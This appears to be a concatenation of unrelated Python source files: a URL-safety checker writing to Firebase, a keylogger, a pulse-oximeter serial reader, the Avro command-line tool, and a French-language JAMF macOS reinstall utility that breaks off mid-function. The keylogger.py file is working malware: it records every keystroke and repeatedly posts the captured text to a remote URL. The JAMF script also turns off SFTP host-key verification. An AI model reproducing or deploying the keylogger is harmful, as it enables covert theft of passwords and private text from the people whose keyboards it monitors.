if http_result[0] != 3 and https_result[0] == 3:
safe_to_visit = False
# If we have a dead URL we don't need to check the redirects and certificate errors.
if safe_to_visit is not None:
# We only have a safe website when we have NO certificate errors
# and if HTTP is correctly redirected to HTTPS.
if https_result[0] != 2 and http_result[0] != 2 and 'https://' in http_result[1] and 'https://' in https_result[1]:
safe_to_visit = True
if safe_to_visit:
safety = True
log_print('SAFE to visit', 'ok')
elif safe_to_visit is None:
safety = None
log_print('DEAD URL', 'ok')
else:
safety = False
log_print('UNSAFE to visit', 'ok')
return safety
# Function to store data in Firebase.
def store_data(url, data):
# Hash the url to use it as ID and safe the data object.
db.collection(db_collection).document(hashlib.md5(url.encode()).hexdigest()).set(data)
# Function to do as a thread.
def verify_and_store_url(urls, search_string):
for url in urls:
doc_ref = db.collection(db_collection).document(hashlib.md5(url.encode()).hexdigest())
try:
doc = doc_ref.get()
# If we're past this line, this means we found data and thus could skip it.
continue
except google.cloud.exceptions.NotFound:
pass
# Check if the URL is safe.
safety = verify_url(url)
# store the data in Firebase.
data = {
u'method': u'search',
u'search_key': str(search_string),
u'URL': str(url),
u'safety': str(safety)
}
store_data(url, data)
######################
# GOOGLE SEARCH INIT #
######################
if config['google_search']['enabled']:
log_print('Google Search enabled.')
google_search_config = config['google_search']
# Set some other variables.
top_level_domain = google_search_config['top_level_domain']
language = google_search_config['language']
number_of_results = google_search_config['number_of_results']
timeout = google_search_config['timeout']
log_print('Initialising the Google Keywords configuration.')
google_keywords_config = ''
with open("google_keywords.yml", 'r') as keywords_stream:
try:
google_keywords_config = yaml.load(keywords_stream)
log_print('Google Keywords configuration loaded', 'success')
except yaml.YAMLError as exc:
log_print('Failed to initialise the Google Keywords configuration.', 'critical')
print(exc)
# Load extra params from the config.
force_include_links = google_keywords_config['force_include_links']
exclude_urls = google_keywords_config['exclude_urls']
search_strings = google_keywords_config['search_strings']
########################
# FORCE INCLUDED LINKS #
########################
if force_include_links is not None and len(force_include_links) > 0:
log_print('Processing all force include links.')
log_print('---------------------------------------------', 'none')
for force_include_link in force_include_links:
safety = verify_url(force_include_link)
# store the data in Firebase.
data = {
u'method': u'force',
u'URL': str(force_include_link),
u'safety': str(safety)
}
store_data(force_include_link, data)
else:
log_print('No links force included.')
##################
# SEARCH STRINGS #
##################
if search_strings is not None and len(search_strings) > 0:
log_print('Start searching for all keywords on Google')
log_print('---------------------------------------------', 'none')
threads = []
for search_string in search_strings:
log_print('Starting to search for: ' + search_string)
counter = 0
matched_urls = []
# We keep searching until we reached the max results.
for search_result in search(search_string, tld=top_level_domain, lang=language, pause=timeout):
# Get the base domain of the URL.
base_domain = "{0.scheme}://{0.netloc}/".format(urlsplit(search_result))
# We need to skip all the exclude URL's.
if any([excl in base_domain for excl in exclude_urls]):
continue
# Check if the base URL isn't already in the matched_urls list.
if base_domain in matched_urls:
continue
# Increase the counter.
counter += 1
# Store the URLS in the matched urls array (so we're not doing two actions at the same time).
matched_urls.append(base_domain)
# Break the for loop if we reached the maximum results.
if counter == number_of_results:
break
# Create a thread to process all the URLS.
thread = threading.Thread(target=verify_and_store_url, args=(matched_urls, search_string))
thread.daemon = True
threads.append(thread)
thread.start()
# Join all the threads so we can continue until they are finished.
for thread in threads:
thread.join()
else:
log_print('No search strings provided.')
print('Finished at: ' + str(datetime.now()))
|
keylogger.py | from pynput import keyboard
from threading import Thread
from requests import post
from time import sleep
from json import dumps
url = "http://127.0.0.1:5000/"
delay = 5
headers = {
"Content-Type": "application/json",
"User-Agent": "localtunnel"
}
keys = {}
cle = ""
def envoi_fichier():
global cle
while True:
print(post(url, headers=headers, data=dumps({"key":cle}).encode("utf-8")))
cle = ""
sleep(delay)
for i in range(11):
keys["<" + str(i + 96) + ">"] = str(i)
def on_press(key):
global cle
key = str(key)
if key in keys:
key = keys[key]
if key[0] == "'" and key[2] == "'":
key = key[1]
if key == "Key.ctrl_l":
key = "ctrl"
if key == "Key.caps_lock":
key = "maj_lock"
if key == "Key.shift":
key = "shift"
if key == "Key.enter":
key = "enter"
if key == "Key.space":
key = "space"
if key == "Key.backspace":
key = "delete"
if key == str(r"'\x03'"):
key = "ctrl_c"
if key == str(r"'\x16'"):
key = "ctrl_v"
if key == str(r"'\x13'"):
key = "ctrl_s"
if key == str(r"'\x06'"):
key = "ctrl_f"
if key == str(r"'\x08'"):
key = "ctrl_h"
cle += f"{key}\n"
Thread(target=envoi_fichier).start()
with keyboard.Listener(on_press=on_press) as listener:
listener.join()
|
cms50e.py | import sys
import threading
import serial
from time import sleep
from blessings import Terminal
SYNC = 0x80
PULSE = 0x40
OUTPUT = """
Heartrate:\t\t {}
Oxygen saturation:\t {}
Pulse waveform:\t\t {}
Hit Ctrl+C to exit.
"""
class PulseOximeterReader(object):
"""
This class reads data from a Contec CMS50E pulse oximeter. The data
is read by a separate thread.
The data is output to the terminal. Use the `run` method to start.
"""
def __init__(self,
port,
baudrate=19200,
timeout=2,
parity=serial.PARITY_ODD):
self.waveform = 0
self.heartrate = 0
self.oxygen = 0
self.reading = False
self.terminal = Terminal()
self.thread = None
self.serial = serial.Serial(port,
baudrate=baudrate,
timeout=timeout,
parity=parity)
def run(self):
self.reading = True
self.sync_stream()
self.thread = threading.Thread(target=self._run_thread)
self.thread.start()
try:
while self.thread.is_alive():
self.print_output()
sleep(0.05)
except KeyboardInterrupt:
self.reading = False
def sync_stream(self):
"""Find the sync bit and read five and five bytes from there."""
while True:
data = self.serial.read(5)
for i, byte in enumerate(data):
if byte & SYNC:
self.serial.read(i) # throw away subsequent i bytes
return
def _run_thread(self):
while self.reading:
data = self.serial.read(5)
self.process_data(data)
def process_data(self, data):
"""Process the data and store it on the reader."""
data = self.serial.read(5)
# In case we go out of sync, re-synchronise the stream.
# This might happen if data upload is enabled on the device.
if not data[0] & SYNC:
self.sync_stream()
self.waveform = data[1]
self.heartrate = data[3]
self.oxygen = data[4]
def print_output(self):
with self.terminal.fullscreen():
print(
OUTPUT.format(
self.heartrate, self.oxygen, self.waveform
)
)
if __name__ == '__main__':
if not sys.argv[1]:
print('Please provide the device identifier as an argument.')
reader = PulseOximeterReader(sys.argv[1])
reader.run()
|
tool.py | #!/usr/bin/env python3
# -*- mode: python -*-
# -*- coding: utf-8 -*-
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Command-line tool
NOTE: The API for the command-line tool is experimental.
"""
import http.server
import os.path
import sys
import threading
import urllib.parse
import warnings
import avro.datafile
import avro.io
import avro.ipc
import avro.protocol
class GenericResponder(avro.ipc.Responder):
def __init__(self, proto, msg, datum):
proto_json = open(proto, 'rb').read()
avro.ipc.Responder.__init__(self, avro.protocol.parse(proto_json))
self.msg = msg
self.datum = datum
def invoke(self, message, request):
if message.name == self.msg:
print("Message: %s Datum: %s" % (message.name, self.datum), file=sys.stderr)
# server will shut down after processing a single Avro request
global server_should_shutdown
server_should_shutdown = True
return self.datum
class GenericHandler(http.server.BaseHTTPRequestHandler):
def do_POST(self):
self.responder = responder
call_request_reader = avro.ipc.FramedReader(self.rfile)
call_request = call_request_reader.read_framed_message()
resp_body = self.responder.respond(call_request)
self.send_response(200)
self.send_header('Content-Type', 'avro/binary')
self.end_headers()
resp_writer = avro.ipc.FramedWriter(self.wfile)
resp_writer.write_framed_message(resp_body)
if server_should_shutdown:
print("Shutting down server.", file=sys.stderr)
quitter = threading.Thread(target=self.server.shutdown)
quitter.daemon = True
quitter.start()
def run_server(uri, proto, msg, datum):
url_obj = urllib.parse(uri)
server_addr = (url_obj.hostname, url_obj.port)
global responder
global server_should_shutdown
server_should_shutdown = False
responder = GenericResponder(proto, msg, datum)
server = http.server.HTTPServer(server_addr, GenericHandler)
print("Port: %s" % server.server_port)
sys.stdout.flush()
server.allow_reuse_address = True
print("Starting server.", file=sys.stderr)
server.serve_forever()
def send_message(uri, proto, msg, datum):
url_obj = urllib.parse(uri)
client = avro.ipc.HTTPTransceiver(url_obj.hostname, url_obj.port)
proto_json = open(proto, 'rb').read()
requestor = avro.ipc.Requestor(avro.protocol.parse(proto_json), client)
print(requestor.request(msg, datum))
##
# TODO: Replace this with fileinput()
def file_or_stdin(f):
return sys.stdin if f == '-' else open(f, 'rb')
def main(args=sys.argv):
if len(args) == 1:
print("Usage: %s [dump|rpcreceive|rpcsend]" % args[0])
return 1
if args[1] == "dump":
if len(args) != 3:
print("Usage: %s dump input_file" % args[0])
return 1
for d in avro.datafile.DataFileReader(file_or_stdin(args[2]), avro.io.DatumReader()):
print(repr(d))
elif args[1] == "rpcreceive":
usage_str = "Usage: %s rpcreceive uri protocol_file " % args[0]
usage_str += "message_name (-data d | -file f)"
if len(args) not in [5, 7]:
print(usage_str)
return 1
uri, proto, msg = args[2:5]
datum = None
if len(args) > 5:
if args[5] == "-file":
reader = open(args[6], 'rb')
datum_reader = avro.io.DatumReader()
dfr = avro.datafile.DataFileReader(reader, datum_reader)
datum = next(dfr)
elif args[5] == "-data":
print("JSON Decoder not yet implemented.")
return 1
else:
print(usage_str)
return 1
run_server(uri, proto, msg, datum)
elif args[1] == "rpcsend":
usage_str = "Usage: %s rpcsend uri protocol_file " % args[0]
usage_str += "message_name (-data d | -file f)"
if len(args) not in [5, 7]:
print(usage_str)
return 1
uri, proto, msg = args[2:5]
datum = None
if len(args) > 5:
if args[5] == "-file":
reader = open(args[6], 'rb')
datum_reader = avro.io.DatumReader()
dfr = avro.datafile.DataFileReader(reader, datum_reader)
datum = next(dfr)
elif args[5] == "-data":
print("JSON Decoder not yet implemented.")
return 1
else:
print(usage_str)
return 1
send_message(uri, proto, msg, datum)
return 0
if __name__ == "__main__":
if os.path.dirname(avro.io.__file__) in sys.path:
warnings.warn("Invoking avro/tool.py directly is likely to lead to a name collision "
"with the python io module. Try doing `python -m avro.tool` instead.")
sys.exit(main(sys.argv))
|
Reinstall_oneclick_mac.py | #!/usr/local/bin/python2.7
# -*- coding: utf-8 -*-
"""
Programmers : VBNIN - IPEchanges
Python version : 2.7.16
This python app allows the user to reset its session with default settings loaded from the JAMF server
Changelog :
v0.1.1 : App creation
v0.2.2 : App working for computer reset
v0.3.1 : App modified to check for local installers and remote installers on Jamf
v0.3.2 : Modified the error messages during execution
v0.3.3 : Modifications added to make the script OK
v0.4.1 : Code modified to check if local installer exists before remote download
v0.4.2 : Removed support phone number
v0.4.3 : Added support for forbidden character in computer's name
v0.4.4 : Changed color for ongoing download
v0.4.5 : add list_building fonction for only admin
v0.5.2 : Added mdm profile removing
v0.6.1 : Disabled MDM profile removing and added json export to distant SFTP
v0.6.2 : Modified reinstall command in delete computer function (removed applicationpath flag)
v0.7.1 : Massive code update
v0.7.2 : Changed the location of log button
v0.7.3 : Removed pop up after launch reset command
v0.7.4 : Added autologon option
v0.7.5 : Added caffeine module to prevent mac from sleeping
v0.7.6 : Added jamfHelper splash screen before reboot
"""
title = 'JAMF OneClick Reinstall'
version = 'Version 0.7.6 - 21/08/2019'
###########################################################################
#### Import internal libraries
###########################################################################
import Tkinter as tk
import tkMessageBox
import ttk
import tkFont as tkfont
import logging
import sys
import os
import subprocess
import re
import threading
import time
import csv
import json
from logging.handlers import RotatingFileHandler
###########################################################################
### Activatin main logger in a rotated log file
###########################################################################
try:
logs_file = '/var/log/jamf_ftv.log'
handler = RotatingFileHandler(logs_file, maxBytes=10000000, backupCount=5)
handler.setFormatter(logging.Formatter('%(asctime)s : %(message)s'))
logging.basicConfig(level=logging.INFO, format='%(asctime)s : %(message)s')
log = logging.getLogger(__name__)
log.addHandler(handler)
log.info("Initialisation du fichier de log dans {}".format(logs_file))
except Exception as e:
sys.exit("*** Erreur *** Impossible d'initialiser le fichier de logs : {}".format(e))
###########################################################################
### Tools API Jamf
###########################################################################
def get_serial():
"""Getting computer's serial number"""
try:
cmd = "system_profiler SPHardwareDataType | grep 'Serial Number' | awk '{print $4}'"
result = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
sn = [line for line in result.stdout]
my_serial = re.sub(r'\W+', '', sn[0])
log.info('Votre numรฉro de sรฉrie est : {}'.format(my_serial))
return my_serial
except:
return None
def list_computers(headers, auth):
'''List all the computers in Jamf'''
url = jamf['url_jamf'] + '/JSSResource/computers'
response = requests.get(url, headers=headers, auth=(auth['api_user'], auth['api_pass']))
return response.json()['computers']
def list_buildings(headers, auth):
'''List all the available buildings in Jamf'''
url = jamf['url_jamf'] + '/JSSResource/buildings'
response = requests.get(url, headers=headers, auth=(auth['api_user'], auth['api_pass']))
buildings = []
for building in response.json()['buildings']:
buildings.append(building["name"])
return buildings
def computer_detail(id, headers, auth):
'''Get all the details of this Mac.'''
url = jamf['url_jamf'] + '/JSSResource/computers/id/{}'.format(id)
response = requests.get(url, headers=headers, auth=(auth['api_user'], auth['api_pass']))
return response.json()['computer']
def search_local_installer(recommended_version):
'''Search for a macOS installer and check its version in the package'''
try:
version_last_digits = recommended_version[3:]
file = "/Applications/install macOS Mojave.app/Contents/version.plist"
with open(file, "r") as f:
content = f.read()
if version_last_digits in content:
log.info("Installeur local compatible dรฉtectรฉ")
return "install macOS Mojave"
else:
log.info("Installeur local dรฉtectรฉ mais version non compatible avec les recommandations Jamf : {}".format(recommended_version))
return False
except IOError:
log.warning("Aucun installeur macOS local trouvรฉ dans /Applications")
return False
except Exception as e:
log.error("Erreur inconnue dans search_local_installers : {}".format(e))
return False
def list_policies(headers, auth, match):
'''List all the available policies in Jamf and keep only the relevant ones'''
try:
url = jamf['url_jamf'] + '/JSSResource/policies'
response = requests.get(url, headers=headers, auth=(auth['api_user'], auth['api_pass']))
policies = []
log.info('Sรฉlection des policies Jamf dont le nom contient : "{}"'.format(match))
for policy in response.json()['policies']:
if match in policy["name"]:
policies.append(policy["name"])
return policies
except Exception as e:
log.error("Erreur inconnue dans lisst_policies : {}".format(e))
def get_policy_details(headers, auth, policy):
'''Get the event trigger for a designated policy'''
policy = policy.split(' ')
policy = "%20".join(policy)
url = jamf['url_jamf'] + '/JSSResource/policies/name/{}'.format(policy)
response = requests.get(url, headers=headers, auth=(auth['api_user'], auth['api_pass']))
return response.json()
def get_computer_history(headers, auth, id):
'''Get a full jamf history of this Mac.'''
try:
url = jamf['url_jamf'] + '/JSSResource/computerhistory/id/{}'.format(id)
response = requests.get(url, headers=headers, auth=(auth['api_user'], auth['api_pass']))
return response.json()
except Exception as e:
log.error("Erreur pendant la rรฉcupรฉration de l'historique Jamf ! Raison : {}".format(e))
return None
def json_to_csv(json_file, serial, name):
'''Export a JSON object to a file'''
try:
now = time.strftime('%y%m%d-%H%M%S')
title = "{}_history_{}_{}.json".format(now, serial, name)
file_path = '/tmp/{}'.format(title)
with open(file_path, 'w') as json_output:
json.dump(json_file, json_output)
return file_path
except Exception as e:
log.error('Erreur pendant la crรฉation du fichier JSON local ! Raison : {}'.format(e), exc_info=True)
return None
def sftp_upload(file_to_upload):
try:
address_and_port = jamf['sftp_address'].split(':')
address = address_and_port[0]
port = address_and_port[1]
user_and_pswd = jamf['sftp_credentials'].split(':')
user = user_and_pswd[0]
pswd = user_and_pswd[1]
cnopts = pysftp.CnOpts()
cnopts.hostkeys = None
cnopts.log = True
srv = pysftp.Connection(
host=address,
username=user,
password=pswd,
port=int(port),
cnopts=cnopts
)
log.info('Connection rรฉussie avec {}'.format(jamf['sftp_address']))
except Exception as e:
log.error("Erreur pendant la connexion avec {} - raison : {}".format(jamf['sftp_address'], e))
return False
try:
with srv.cd(sftp_root):
srv.put(file_to_upload)
except Exception as e:
log.error("Erreur pendant l'upload du fichier {} - raison : {}".format(file_to_upload, e), exc_info=True)
else:
return True
def upload_history(headers, auth, comp_id, serial, name):
'''Function to upload a history toward a SFTP server'''
log.info("Rรฉcupรฉration de l'historique depuis la base de donnรฉes Jamf")
history = get_computer_history(headers, auth, comp_id)
if history is not None:
log.info("Conversion de l'historique JSON en fichier JSON local")
file_to_upload = json_to_csv(history, serial, name)
if file_to_upload is not None:
log.info("Fichier {} crรฉรฉ, dรฉmarrage de l'upload SFTP...".format(file_to_upload))
if sftp_upload(file_to_upload) is True:
log.info("Historique Jamf uploadรฉ avec succรจs vers {}".format(jamf['sftp_address']))
return True
else:
return False
else:
return False
else:
return False
def delete_computer(computer_id, auth):
'''Delete the given computer from Jamf'''
url = jamf['url_jamf'] + '/JSSResource/computers/id/{}'.format(computer_id)
response = requests.delete(url, auth=(auth['api_user'], auth['api_pass']))
response = "{}".format(response)
if response == '<Response [200]>':
return True
else:
log.error("Echec de la suppression de la DB Jamf ! Rรฉponse du serveur : {}".format(response))
return False
def launch_reset(app):
'''Launch the reset command'''
app_backslash = app.split(' ')
app_backslash = r'\ '.join(app_backslash)
cmd = r'/Applications/{}.app/Contents/Resources/startosinstall --eraseinstall --newvolumename "Macintosh HD" --nointeraction --agreetolicense >> {}'.format(app_backslash, logs_file)
log.info('Running command : {}'.format(cmd))
subprocess.call(cmd, shell=True)
return True
def jamf_cmd(cmd):
'''Launch a custom Jamf command'''
try:
cmd = cmd.split(' ')
cmd_line = ['/usr/local/bin/jamf'] + cmd
inventory = subprocess.Popen(cmd_line, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(out, err) = inventory.communicate()
if inventory.returncode == 0:
log.info("Commande JAMF '{}' exรฉcutรฉe. Rรฉsultat : {}".format(cmd, out))
return True
else:
raise Exception(err)
except Exception as e:
log.error("Erreur : pendant l'exรฉcution de la commande JAMF '{}' : {}".format(cmd, e))
return False
def show_logs(event=None):
'''Launch a shell command to open log Console on the specified logfile'''
subprocess.call("open -a Console {}".format(logs_file), shell=True)
def show_jamfhelper():
# Splash Screen Jamf Helper variables
jamfHelper = "/Library/Application Support/JAMF/bin/jamfHelper.app/Contents/MacOS/jamfHelper"
heading = "Redรฉmarrage en cours"
description = "Veuillez patienter, votre Mac va redรฉmarrer dans quelques instants..."
icon = "/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/NetBootVolume.icns"
# Launch Splash Screen
subprocess.Popen('"{}" -windowType fs -heading "{}" -description "{}" -icon "{}" &'.format(jamfHelper, heading, description, icon), shell=True)
###########################################################################
### This is the main class
###########################################################################
class JamfOneClickReinstall():
''' This class runs the main window of the application '''
def __init__(self, root):
# Jamf API headers
self.json_headers = {
'Accept':'application/json'
}
# Checkin computer serial number
self.my_serial = get_serial()
if self.my_serial is None:
log.error("Erreur : impossible de dรฉterminer le numรฉro de sรฉrie de ce Mac !")
sys.exit(1)
# Initializing root window
root.title_font = tkfont.Font(family='Helvetica', size=18, weight="bold")
root.title(title + ', ' + version)
root.resizable(False, False)
root.tk_setPalette(background='#ececec')
width = 900
height = 400
x = int(root.winfo_screenwidth() / 2 - width / 2)
y = int(root.winfo_screenheight() / 2 - height / 2)
root.geometry("{}x{}+{}+{}".format(width, height, x, y))
root.bind("<Return>", self.connect)
# Creating the container frame
self.container = tk.Frame(master=root)
self.container.pack(side="top", fill="both", expand=True)
self.container.grid_rowconfigure(0, weight=1)
self.container.grid_columnconfigure(0, weight=1)
# Launching first frame
self.frame()
# Displaying credentials frame or using autologon
if jamf['autologon'].lower() == 'oui':
self.connect(autologon='oui')
else:
self.user_login_frame()
#############################################
### Class tools
#############################################
def info(self, title, msg):
'''Display an info popup and logs to file'''
log.info(msg)
tkMessageBox.showinfo(title, msg)
root.update()
def error(self, title, msg):
'''Display an error popup and logs to file'''
log.error(msg)
tkMessageBox.showinfo(title, msg)
root.update()
def connect(self, event=None):
'''Try to connect to Jamf api server by listing all buildings in jamf. If succeed : connect is OK'''
try:
self.auth = {
'api_user':self.log_user.get(),
'api_pass':self.log_pswd.get()
}
list_buildings(self.json_headers, self.auth)
except ValueError:
self.error("Erreur de connexion", "Identifiants invalides ou non autorisรฉs...")
except requests.ConnectionError:
self.error("Erreur de connexion", "Serveur Jamf injoignable, veuillez vรฉrifier votre accรจs rรฉseau...")
except Exception as e:
self.error("Erreur de connexion", "Impossible de lancer la connexion au serveur Jamf.\nRaison : {}".format(e))
else:
log.info("Identifiant API Jamf '{}' connectรฉ".format(self.auth['api_user']))
self.login_frame.destroy()
self.wait = tk.Label(self.main_frame, text='Veuillez patienter...', font='System 50 bold')
self.wait.pack(fill='both', anchor='center', pady=50)
root.update()
root.after(500, self.get_jamf_info)
def connect(self, autologon=None, event=None):
'''Try to connect to Jamf api server by listing all buildings in jamf. If succeed : connect is OK'''
try:
if autologon == 'oui':
self.auth = {
'api_user':jamf['api_user'],
'api_pass':jamf['api_pswd']
}
else:
self.auth = {
'api_user':self.log_user.get(),
'api_pass':self.log_pswd.get()
}
list_buildings(self.json_headers, self.auth)
except ValueError:
self.error("Erreur de connexion", "Identifiants invalides ou non autorisรฉs...")
root.update()
except requests.ConnectionError:
self.error("Erreur de connexion", "Serveur Jamf injoignable, veuillez vรฉrifier votre accรจs rรฉseau...")
root.update()
except Exception as e:
self.error("Erreur de connexion", "Impossible de lancer la connexion au serveur Jamf.\nRaison : {}".format(e))
root.update()
else:
log.info("Identifiant API Jamf '{}' connectรฉ".format(self.auth['api_user']))
try:
self.login_frame.destroy()
except:
pass
self.wait = tk.Label(self.main_frame, text='Veuillez patienter...', font='System 50 bold')
root.update()
self.wait.pack(fill='both', anchor='center', pady=100)
root.after(500, self.get_jamf_info)
def get_jamf_info(self):
'''Search for this computer in Jamf'''
try:
match = False
for computer in list_computers(self.json_headers, self.auth):
comp = computer_detail(computer['id'], self.json_headers, self.auth)
if comp['general']['serial_number'] == self.my_serial:
log.info("Ce Mac a รฉtรฉ identifiรฉ dans jamf, {} avec l'ID {}".format(comp['general']['name'].encode("utf-8"), comp['general']['id']))
self.my_mac = comp
self.my_id = comp['general']['id']
self.my_name = comp['general']['name']
match = True
break
if match is True:
self.wait.destroy()
self.show_config_frame()
else:
self.error('Erreur Jamf', "Aucun lien entre le numรฉro de sรฉrie de ce Mac et la base de donnรฉes Jamf !\nL'application va quitter...")
sys.exit(1)
except Exception as e:
root.update()
text = "Une erreur a empรชchรฉ la rรฉcupรฉration des informations Jamf.\nVeuillez tenter de rafraichir les champs manuellement ou contacter le support IP Echanges\n\nRaison : {}".format(e)
confirm = tkMessageBox.askokcancel("Erreur Jamf", text)
if confirm is True:
root.after(1000, self.get_jamf_info)
def resync(self):
'''Update the fields with a Jamf poll'''
for frame in [self.reset_title_frame, self.reset_frame, self.reset_button_frame]:
try:
frame.destroy()
except:
pass
self.wait = tk.Label(self.main_frame, text='Veuillez patienter...', font='System 50 bold')
self.wait.pack(fill='both', anchor='center', pady=50)
root.after(500, self.get_jamf_info)
#############################################
### Frames
#############################################
def frame(self):
'''This frame is the main canva with different sub-frames inside'''
# Frame du titre principal
header_frame = tk.Frame(self.container, bg='#1E1E1E')
header_frame.pack(fill='both', anchor='n')
tk.Label(header_frame, text=title, font='System 30 bold', fg='#fff', bg='#1E1E1E').pack(side='left', pady=(27, 5))
tk.Label(header_frame, text=version, font='System 18 bold', fg='#fff', bg='#1E1E1E').pack(side='left', padx=10, pady=(37, 5))
# Frame centrale qui sera changรฉe au fur et ร mesure de l'avancement
self.main_frame = tk.Frame(self.container, bg='#ECECEC')
self.main_frame.pack(fill='both', anchor='n', expand='yes')
# Frame contenant le bouton d'affichage des logs
log_frame = tk.Frame(self.container, bg='white')
log_frame.pack(fill='both', side='bottom')
tk.Label(log_frame, text='Emplacement des logs : {}'.format(logs_file), font='System 12 italic', bg='white').pack(side='left', padx=8, pady=8)
tk.Button(log_frame, text='Afficher la console de logs', command=show_logs, highlightbackground='white').pack(side='right', padx=8, pady=8)
def user_login_frame(self):
'''Create a login frame to prevent everyone to use the application'''
self.login_frame = tk.Label(self.main_frame)
self.login_frame.pack(fill='both', side='top')
# Title
tk.Label(self.login_frame, text='Authentification nรฉcessaire', font='System 16 bold').grid(row=0, column=0, sticky='w', pady=(5, 0))
# Login and password fields
self.log_user = tk.StringVar()
tk.Label(self.login_frame, text='Login :').grid(row=1, column=0, sticky='w', padx=(180,10), pady=(60, 0))
e1 = tk.Entry(self.login_frame, textvar=self.log_user, background='white', width=45)
e1.grid(row=1, column=1, sticky='w', pady=(60, 0))
e1.focus()
self.log_pswd = tk.StringVar()
tk.Label(self.login_frame, text='Mot de passe :').grid(row=2, column=0, sticky='w', padx=(180,10), pady=(3, 0))
tk.Entry(self.login_frame, textvar=self.log_pswd, background='white', show='*', width=45).grid(row=2, column=1, sticky='w', pady=(3, 0))
# Buttons
tk.Button(self.login_frame, text='Quitter', command=root.destroy).grid(row=3, column=0, sticky='ew', padx=(180,10), pady=(3, 0))
tk.Button(self.login_frame, text='Connexion', command=self.connect).grid(row=3, column=1, sticky='ew', pady=(3, 0))
def show_config_frame(self):
'''This frame displays the main configuration fields'''
# MacOS reset title
self.reset_title_frame = tk.Frame(self.main_frame)
self.reset_title_frame.pack(fill='both', side='top')
self.reset_title = tk.Label(self.reset_title_frame, text="Rรฉinitialisation complรจte de MacOS", font='System 16 bold')
self.reset_title.pack(side='left', padx=5, pady=5)
# MacOS reset frame
self.reset_frame = tk.Frame(self.main_frame)
self.reset_frame.pack(fill='both', side='top', padx=5)
# MacOS Installer Choice
text = tk.Label(self.reset_frame, text="Version macOS ร rรฉinstaller ({} recommandรฉ) :".format(jamf["macos_last_version"]))
text.grid(row=2, column=0, sticky='w', padx=10, pady=(30, 0))
installers = search_local_installer(jamf['macos_last_version'])
if installers is False:
self.install_type = 'remote'
log.info("Recherche d'installeurs distants dans la DB Jamf")
installers = list_policies(self.json_headers, self.auth, jamf['policy_match_name'])
if len(installers) == 0:
self.error("Erreur", "Aucun installeur MacOS trouvรฉ dans la DB Jamf !")
self.resync()
else:
installers = [installers]
self.install_type = 'local'
self.installer = tk.StringVar()
self.installer.set(installers[0])
tk.OptionMenu(self.reset_frame, self.installer, *installers).grid(row=2, column=1, sticky='ew', pady=(30, 0))
# Buttons
self.reset_button_frame = tk.Frame(self.main_frame)
self.reset_button_frame.pack(fill='both', side='top')
tk.Button(self.reset_button_frame, text='Lancer la rรฉinstallation', command=self.reset_computer).pack(fill='x', expand='yes', side='right', padx=5, pady=10)
tk.Button(self.reset_button_frame, text='Annuler et quitter', command=root.destroy).pack(fill='x', expand='yes', side='right', padx=(5, 0), pady=10)
def reset_computer(self):
'''Delete the computer from Jamf DB and reinstall it from scratch'''
try:
confirm = tkMessageBox.askokcancel("Confirmation nรฉcessaire", "Vous รชtes sur le point de totalement rรฉinstaller votre Mac.\nVoulez-vous continuer ?")
if confirm is not True:
log.info("Rรฉinstallation annulรฉe par l'utilisateur, redรฉmarrage de l'application...")
self.resync()
return
else:
# Destroy the previous frames and create a new one with steps states
self.reset_button_frame.destroy()
self.reset_frame.destroy()
self.reset_frame = tk.Frame(self.main_frame)
self.reset_frame.pack(fill='both', side='top', padx=5)
list_steps = [
["check_download", "Tรฉlรฉchargement de l'installeur MacOS en attente..."],
["check_del_adobe", 'Dรฉsactivation de la suite Adobe CC2019 en attente...'],
["check_del_eset", "Suppression de l'antivirus ESET en attente..."],
["check_upload_history", "Sauvegarde des infos Jamf vers SFTP en attente..."],
["check_del_computer", 'Suppression de la base Jamf en attente...'],
["check_launch_reset", "Rรฉinitialisation de l'ordinateur en attente..."],
["check_reboot", ""]
]
step ={}
i = 0
for each_step in list_steps:
step[each_step[0]] = tk.Label(self.reset_frame, text=each_step[1])
step[each_step[0]].grid(row=i, column=0, sticky='w', padx=100, pady=(3, 0))
i += 1
root.update()
### Launch the steps
# If installer is 'remote', download it from Jamf. Else launch directly the reinstall
if self.install_type == 'remote':
try:
chosen_policy = get_policy_details(self.json_headers, self.auth, self.installer.get())
trigger = chosen_policy['policy']['general']['trigger_other']
log.info("Tรฉlรฉchargement de l'installeur MacOS en cours, veuillez patienter...")
step['check_download'].configure(text="Tรฉlรฉchargement de l'installeur MacOS en cours...", fg="blue")
root.update()
if jamf_cmd('policy -event {}'.format(trigger)) is True:
log.info("Tรฉlรฉchargement terminรฉ")
package_name = search_local_installer(jamf['macos_last_version'])
if package_name is not False:
step['check_download'].configure(text="Tรฉlรฉchargement terminรฉ et validรฉ", fg="green")
else:
raise Exception("Le paquet tรฉlรฉchargรฉ n'a pas รฉtรฉ trouvรฉ dans la liste des applications")
else:
raise Exception("La commande Jamf de tรฉlรฉchargement du paquet a terminรฉ en erreur")
except Exception as e:
log.error("Erreur pendant le tรฉlรฉchargement : {}".format(e), exc_info=True)
step['check_download'].configure(text="Tรฉlรฉchargement en erreur !", fg="red")
self.error("Erreur", "Une erreur a empรชchรฉ le tรฉlรฉchargement de l'installeur MacOS ! Annulation...")
self.resync()
return
else:
package_name = self.installer.get()
step['check_download'].configure(text="Installeur local sรฉlectionnรฉ", fg="green")
root.update()
# Remove all adobe CC2019 apps with jamf policy
if os.path.exists('/Applications/Adobe Premiere Pro CC 2019/Adobe Premiere Pro CC 2019.app/Contents/Info.plist'):
if jamf_cmd('policy -event uninstall_adobe') is True:
log.info("Applications Adobe supprimรฉes avec succรจs")
step['check_del_adobe'].configure(text="Dรฉsactivation de la suite Adobe CC2019 : OK", fg="green")
else:
step['check_del_adobe'].configure(text="Dรฉsactivation de la suite Adobe CC2019 : Erreur", fg="red")
log.error("Une erreur a empรชchรฉ la suppression des applications Adobe !")
else:
step['check_del_adobe'].configure(text="Dรฉsactivation de la suite Adobe CC2019 : Non installรฉ", fg="green")
